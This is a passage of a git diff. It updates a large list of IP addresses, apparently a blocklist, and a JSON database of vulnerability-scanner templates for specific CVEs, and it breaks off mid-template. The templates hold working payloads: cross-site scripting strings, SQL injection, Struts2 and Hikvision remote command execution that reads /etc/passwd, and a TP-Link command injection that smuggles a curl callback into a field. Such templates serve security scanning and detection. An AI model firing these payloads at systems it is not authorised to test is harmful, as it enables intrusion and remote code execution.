-82.119.124.138
+82.111.224.128
+82.111.224.129
+82.117.199.206
 82.127.219.71
-82.129.224.250
 82.129.226.42
-82.152.155.152
+82.143.154.104
+82.147.85.78
+82.147.85.79
+82.153.21.60
+82.156.123.122
 82.156.158.249
-82.156.165.91
+82.156.161.165
 82.156.235.34
-82.156.3.162
 82.157.140.231
 82.157.156.116
-82.157.239.51
+82.157.21.149
 82.157.247.129
-82.157.41.6
 82.157.70.56
+82.165.110.236
 82.18.163.228
-82.200.86.210
-82.208.107.157
-82.208.65.46
-82.213.214.59
 82.214.118.45
-82.219.62.114
-82.64.11.95
+82.64.186.234
 82.64.9.81
 82.65.162.93
+82.65.197.203
 82.65.34.213
 82.66.143.175
+82.66.188.48
 82.66.252.172
 82.66.59.170
-83.12.148.202
-83.139.6.147
+82.80.138.20
+83.136.176.12
 83.143.246.30
-83.151.234.54
-83.169.248.43
+83.150.215.253
+83.188.240.220
 83.209.107.31
 83.209.225.143
 83.221.176.86
-83.233.56.71
+83.228.105.85
 83.233.86.147
-83.235.21.252
 83.239.204.140
-83.249.123.141
-83.253.194.67
+83.239.84.130
+83.251.201.70
 83.50.46.86
 83.61.0.145
 83.97.73.87
-84.105.72.67
-84.180.247.108
+84.121.129.27
+84.17.61.194
+84.201.158.231
+84.212.213.35
+84.221.96.49
 84.228.10.170
-84.232.94.56
 84.235.46.149
-84.238.187.217
-84.238.23.220
-84.238.27.103
-84.238.92.245
-84.241.29.120
-84.242.124.74
+84.240.224.102
+84.240.42.68
+84.241.63.224
 84.243.238.30
+84.252.143.78
+84.42.20.248
+84.42.70.218
 84.54.51.121
+84.54.51.219
 84.54.51.252
 84.54.51.4
-84.96.22.9
-85.104.100.55
-85.105.177.248
+84.54.51.99
+84.60.190.220
+85.105.158.34
 85.112.78.163
-85.114.135.225
-85.140.31.119
+85.114.119.22
+85.114.138.220
 85.15.190.226
 85.152.30.138
-85.152.57.60
 85.158.32.13
-85.159.164.28
+85.159.163.143
 85.172.106.202
-85.172.60.21
-85.19.195.12
+85.185.201.10
+85.185.64.219
+85.185.75.98
 85.191.156.88
 85.192.41.110
-85.192.9.34
-85.193.210.81
+85.192.41.225
 85.195.28.115
-85.203.26.53
-85.208.96.193
-85.208.96.194
+85.204.107.62
 85.208.96.195
 85.208.96.196
 85.208.96.197
@@ -9468,190 +9568,130 @@
 85.208.96.200
 85.208.96.201
 85.208.96.202
-85.208.96.203
 85.208.96.204
 85.208.96.206
 85.208.96.207
 85.208.96.208
 85.208.96.209
 85.208.96.210
-85.208.96.211
 85.208.96.212
-85.215.124.127
-85.217.144.141
-85.227.84.200
+85.209.11.117
+85.209.176.33
+85.215.162.179
 85.227.85.186
 85.227.85.29
-85.228.158.212
-85.234.116.19
-85.237.38.194
-85.237.38.228
 85.237.40.115
+85.237.55.203
 85.237.55.233
-85.238.209.247
-85.239.33.6
-85.24.168.235
+85.237.57.200
 85.24.197.232
 85.244.137.121
-85.252.41.163
-85.26.230.160
-85.30.198.182
+85.26.136.53
 85.31.45.30
 85.31.45.34
-85.31.45.40
-85.50.246.66
+85.31.45.37
+85.31.45.41
 85.51.217.156
 85.51.24.68
+85.67.60.35
 85.69.178.104
-85.95.238.36
-85.95.250.4
-86.104.33.196
-86.105.226.85
-86.45.255.194
+86.105.9.67
+86.57.153.252
+86.57.183.121
 86.57.218.140
-86.57.218.177
-86.96.97.162
+86.57.232.71
+86.9.201.96
 86.99.116.206
+87.103.126.54
 87.103.192.129
-87.119.220.239
-87.120.84.110
+87.107.71.44
 87.120.84.117
 87.120.84.147
-87.120.84.159
-87.120.84.168
+87.120.84.179
 87.120.84.185
-87.120.84.248
+87.120.84.232
 87.120.84.72
-87.120.9.80
-87.121.221.210
 87.121.69.247
+87.126.166.109
+87.19.162.76
+87.197.155.226
 87.229.211.28
-87.229.214.186
-87.236.176.100
-87.236.176.102
-87.236.176.103
-87.236.176.104
-87.236.176.106
-87.236.176.109
-87.236.176.112
-87.236.176.116
-87.236.176.13
-87.236.176.134
-87.236.176.14
-87.236.176.142
-87.236.176.147
-87.236.176.15
-87.236.176.155
-87.236.176.163
-87.236.176.165
-87.236.176.167
-87.236.176.168
-87.236.176.17
-87.236.176.171
-87.236.176.176
-87.236.176.182
-87.236.176.186
-87.236.176.187
-87.236.176.190
-87.236.176.20
-87.236.176.21
-87.236.176.212
-87.236.176.24
-87.236.176.250
-87.236.176.26
-87.236.176.27
-87.236.176.28
-87.236.176.29
-87.236.176.3
-87.236.176.31
-87.236.176.32
-87.236.176.33
-87.236.176.34
-87.236.176.35
-87.236.176.36
-87.236.176.37
+87.233.83.87
+87.236.176.115
+87.236.176.122
+87.236.176.157
+87.236.176.180
+87.236.176.189
+87.236.176.194
+87.236.176.218
+87.236.176.227
+87.236.176.247
 87.236.176.39
-87.236.176.4
-87.236.176.40
-87.236.176.42
-87.236.176.44
-87.236.176.47
-87.236.176.48
-87.236.176.49
-87.236.176.53
-87.236.176.54
-87.236.176.56
-87.236.176.58
-87.236.176.61
-87.236.176.62
+87.236.176.45
+87.236.176.46
+87.236.176.50
+87.236.176.60
 87.236.176.63
-87.236.176.7
-87.236.176.71
 87.236.176.75
-87.236.176.79
-87.236.176.8
-87.236.176.80
-87.236.176.84
-87.236.176.87
-87.236.176.89
-87.236.176.9
-87.236.176.90
-87.236.176.91
-87.236.176.93
-87.236.176.95
+87.236.176.78
+87.236.176.88
 87.236.176.96
-87.236.176.97
-87.236.215.81
 87.237.117.183
+87.247.251.224
 87.249.164.87
-87.251.233.179
+87.251.75.120
+87.255.193.50
+87.27.125.158
+87.63.90.211
 87.79.93.10
-87.98.171.138
 87.98.190.245
 88.117.175.44
-88.129.208.43
-88.138.114.161
+88.149.198.156
 88.152.51.106
 88.153.28.166
 88.166.109.155
 88.168.61.98
+88.198.56.78
 88.201.229.78
-88.204.217.246
-88.208.199.5
+88.204.200.110
+88.208.199.230
 88.214.25.16
+88.214.26.53
+88.215.1.180
 88.215.37.156
+88.247.94.61
 88.248.22.194
-88.249.245.223
-88.80.20.49
-88.87.57.96
+88.250.225.126
+88.250.66.14
+88.88.123.168
 88.91.166.59
-89.10.150.58
-89.10.243.23
+89.101.218.218
 89.106.199.150
-89.145.196.45
+89.117.76.39
 89.151.131.47
 89.151.147.163
 89.154.149.226
-89.160.199.193
+89.163.131.32
+89.165.51.153
+89.169.27.207
+89.178.57.150
 89.181.49.183
 89.186.10.225
 89.187.41.22
 89.190.156.139
-89.190.156.144
 89.190.156.161
 89.190.156.175
 89.190.156.176
-89.20.102.134
-89.212.240.129
+89.213.12.237
 89.216.99.6
+89.218.118.22
 89.218.185.66
-89.22.187.150
 89.231.160.49
-89.232.37.23
+89.235.98.238
+89.236.35.110
 89.236.35.116
-89.248.162.161
+89.248.163.113
 89.248.163.16
-89.248.163.19
 89.248.163.200
 89.248.163.214
 89.248.163.216
@@ -9659,17 +9699,11 @@
 89.248.165.102
 89.248.165.14
 89.248.165.154
-89.248.165.17
-89.248.165.206
 89.248.165.214
-89.248.165.220
-89.248.165.239
 89.248.165.245
 89.248.165.30
 89.248.165.35
 89.248.165.45
-89.248.165.51
-89.248.165.81
 89.248.165.85
 89.248.165.99
 89.248.168.42
@@ -9677,94 +9711,85 @@
 89.248.172.16
 89.249.62.54
 89.252.140.220
+89.37.116.197
+89.37.116.199
+89.37.116.200
+89.40.227.242
+89.40.66.22
+89.44.137.55
+90.141.55.225
 90.144.94.63
-90.146.27.221
-90.150.21.34
-90.151.171.109
-90.160.139.163
+90.151.171.106
 90.161.217.228
-90.166.168.236
-90.168.201.25
-90.176.21.19
 90.187.71.173
 90.188.225.36
-90.228.236.68
-90.92.19.31
+90.188.5.39
+90.226.188.180
 90.95.152.193
+91.109.201.183
+91.116.250.75
 91.121.171.183
-91.122.47.146
-91.122.90.219
-91.130.38.170
+91.122.197.131
 91.130.46.174
-91.134.248.253
-91.135.106.155
+91.130.59.242
+91.134.0.189
 91.135.108.160
-91.135.193.146
-91.135.244.200
-91.135.97.177
-91.143.63.214
-91.172.197.174
-91.185.41.32
+91.147.205.201
+91.165.131.14
 91.191.209.138
 91.191.209.198
 91.191.209.222
-91.193.43.11
-91.196.165.8
-91.197.17.149
+91.193.236.146
 91.200.103.65
-91.205.164.50
-91.206.26.26
+91.204.139.118
 91.206.32.120
 91.207.175.154
-91.207.249.89
-91.213.50.8
-91.213.99.15
+91.218.114.197
+91.218.160.238
+91.219.239.166
 91.223.169.83
 91.223.169.88
+91.225.158.77
 91.225.161.67
-91.226.239.230
-91.227.18.33
 91.227.28.137
-91.230.142.123
+91.233.145.131
 91.233.146.18
-91.233.149.167
-91.235.247.80
-91.236.168.249
+91.238.230.148
+91.238.69.91
+91.238.99.217
 91.239.97.29
 91.240.118.221
 91.240.118.224
+91.240.118.29
 91.240.118.71
 91.240.118.75
 91.240.118.77
-91.240.61.14
+91.241.150.246
+91.249.204.194
 91.73.195.46
 91.73.247.158
-91.73.247.246
 91.74.104.250
-91.84.54.13
-91.84.54.24
-92.115.3.157
-92.118.229.111
-92.118.39.40
-92.169.137.228
+91.75.98.209
+91.84.54.25
+91.92.209.224
+91.98.119.127
+92.118.39.246
+92.130.200.241
 92.189.249.35
-92.204.139.118
-92.205.16.145
-92.241.17.116
-92.27.116.226
-92.27.145.24
-92.27.157.252
+92.204.139.216
+92.204.236.195
+92.207.87.166
+92.223.85.254
+92.241.106.38
+92.253.125.106
+92.255.197.15
+92.33.255.49
 92.35.121.47
-92.44.80.200
 92.54.15.116
-92.55.190.215
-92.62.243.132
-92.62.243.162
+92.58.124.33
 92.63.196.167
-92.63.196.51
-92.63.196.54
-92.63.196.94
-92.63.196.97
+92.63.196.27
+92.63.197.110
 92.63.197.153
 92.63.197.157
 92.63.197.210
@@ -9775,47 +9800,43 @@
 92.63.197.93
 92.63.197.97
 92.68.206.76
-93.108.242.140
-93.113.96.186
+93.107.1.136
+93.115.79.88
+93.121.189.54
 93.123.118.123
-93.123.118.218
 93.123.118.22
 93.123.118.23
 93.123.240.243
 93.127.45.76
-93.144.201.48
-93.144.40.145
-93.144.46.169
-93.149.118.114
+93.157.156.173
 93.174.95.106
+93.179.113.144
 93.179.90.168
-93.183.131.53
-93.183.155.142
 93.187.32.42
 93.190.23.126
-93.245.40.239
-93.33.198.173
-93.39.187.113
-93.39.254.125
-93.42.155.2
+93.38.112.165
 93.46.198.114
-93.61.86.82
+93.54.119.48
+93.55.193.176
 93.62.72.229
 93.74.167.4
+93.80.242.227
 93.86.60.227
-94.100.96.35
 94.100.96.42
 94.100.96.60
+94.100.99.195
 94.102.49.190
 94.102.49.193
+94.102.50.103
 94.102.61.10
 94.102.61.2
 94.102.61.20
-94.102.61.24
+94.102.61.22
 94.102.61.25
 94.102.61.26
 94.102.61.27
 94.102.61.28
+94.102.61.29
 94.102.61.3
 94.102.61.32
 94.102.61.34
@@ -9831,154 +9852,138 @@
 94.102.61.46
 94.102.61.47
 94.102.61.48
+94.102.61.49
 94.102.61.5
 94.102.61.50
-94.102.61.51
+94.102.61.52
 94.102.61.53
 94.102.61.54
 94.102.61.6
-94.102.61.70
 94.102.61.80
-94.127.213.63
+94.127.215.194
+94.131.132.139
 94.136.74.132
-94.141.235.98
-94.141.69.156
-94.142.241.194
+94.137.163.76
+94.142.138.104
 94.143.43.112
 94.156.102.101
 94.156.102.111
 94.156.102.120
 94.156.102.138
-94.156.102.169
-94.156.102.221
 94.156.102.70
 94.156.102.71
 94.156.102.72
 94.156.102.75
 94.156.102.78
 94.156.102.80
-94.156.253.131
-94.156.253.14
-94.156.57.39
+94.156.161.181
+94.156.6.16
 94.156.6.162
+94.156.6.207
 94.156.6.215
 94.156.6.221
-94.156.6.82
 94.158.121.218
 94.158.91.186
-94.183.200.64
-94.20.88.175
+94.20.61.166
 94.200.20.66
 94.200.80.230
-94.202.24.226
 94.202.37.182
-94.203.129.98
 94.203.183.34
-94.204.196.101
 94.205.22.95
 94.206.167.182
+94.206.196.17
 94.206.42.182
-94.206.49.146
 94.206.93.90
 94.207.109.177
+94.228.169.199
 94.228.170.221
 94.229.79.10
-94.23.61.165
-94.230.141.234
-94.239.23.202
+94.229.79.26
+94.232.43.50
 94.241.32.227
-94.26.136.239
-94.26.140.101
-94.26.53.34
-94.27.52.154
-94.45.147.115
-94.46.169.224
-94.46.23.45
+94.254.12.27
+94.255.186.204
+94.26.147.56
+94.3.14.225
+94.41.0.165
 94.65.32.99
 94.66.67.57
-94.76.224.227
+94.74.90.173
+94.76.171.9
+95.106.154.84
 95.124.251.21
 95.124.251.22
 95.124.251.24
 95.124.251.25
-95.124.251.27
-95.124.251.28
 95.124.251.29
 95.130.227.208
-95.138.16.79
 95.141.228.9
+95.142.88.195
 95.142.90.214
-95.153.121.125
-95.155.36.152
+95.153.109.222
+95.156.119.165
 95.165.142.8
-95.167.164.230
 95.173.168.14
+95.175.16.59
 95.182.184.68
-95.188.110.33
-95.214.24.10
+95.209.130.210
+95.214.24.51
 95.214.24.77
 95.214.24.80
 95.214.24.81
-95.214.25.199
+95.214.25.238
 95.214.26.102
 95.214.26.114
-95.214.26.115
 95.214.26.116
 95.214.26.118
 95.214.26.146
 95.214.27.118
-95.214.27.197
+95.214.27.145
 95.214.27.227
 95.214.27.23
-95.214.27.235
+95.214.27.230
 95.214.27.39
+95.214.27.5
 95.214.27.91
+95.214.53.134
 95.214.53.221
 95.214.55.115
+95.214.55.85
 95.214.63.81
-95.236.183.196
-95.254.135.225
-95.35.31.118
-95.35.31.66
+95.215.85.19
+95.222.243.108
+95.255.111.234
+95.255.138.238
 95.35.60.199
 95.42.59.166
-95.56.227.226
-95.57.207.100
-95.69.163.178
-95.70.188.210
-95.76.220.209
+95.79.30.250
+95.84.147.154
+95.85.152.95
 95.87.248.223
-95.9.143.188
-95.9.93.130
 95.90.157.167
 96.1.64.194
-96.11.81.5
-96.116.129.76
-96.116.131.1
-96.116.131.104
+96.1.99.139
+96.10.158.110
+96.116.137.60
 96.116.138.234
-96.116.139.142
-96.116.140.52
-96.118.145.248
-96.118.208.242
-96.118.244.68
+96.116.140.239
+96.116.141.230
+96.118.149.53
+96.118.214.190
 96.126.104.109
-96.126.104.129
-96.126.104.221
-96.224.215.164
-96.233.124.74
+96.28.202.13
+96.35.245.123
 96.40.105.49
-96.49.245.110
 96.65.211.250
 96.65.66.250
 96.67.59.65
-96.78.175.36
-96.87.134.246
-96.87.192.126
+96.78.175.38
 96.88.139.105
-97.107.133.213
+96.88.140.153
+96.91.103.173
+97.104.65.82
+97.107.141.150
 97.65.179.126
-97.74.84.247
 97.87.231.7
 97.92.187.203
 97.92.212.232
@@ -9987,14 +9992,9 @@
 98.116.122.26
 98.144.109.171
 98.152.165.66
-98.152.200.4
-98.155.1.99
+98.235.105.236
 98.30.124.194
-98.96.193.11
-98.96.193.13
-98.96.193.14
+98.96.193.12
 98.96.193.2
-98.96.193.5
-99.224.91.112
-99.46.3.41
-99.47.160.5
+99.252.90.240
+99.47.175.165
diff --git a/db/cves.json b/db/cves.json
index bd1be2b1..e449b4d4 100644
--- a/db/cves.json
+++ b/db/cves.json
@@ -1 +1 @@
-{"templates":[{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(cat /etc/passwd>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 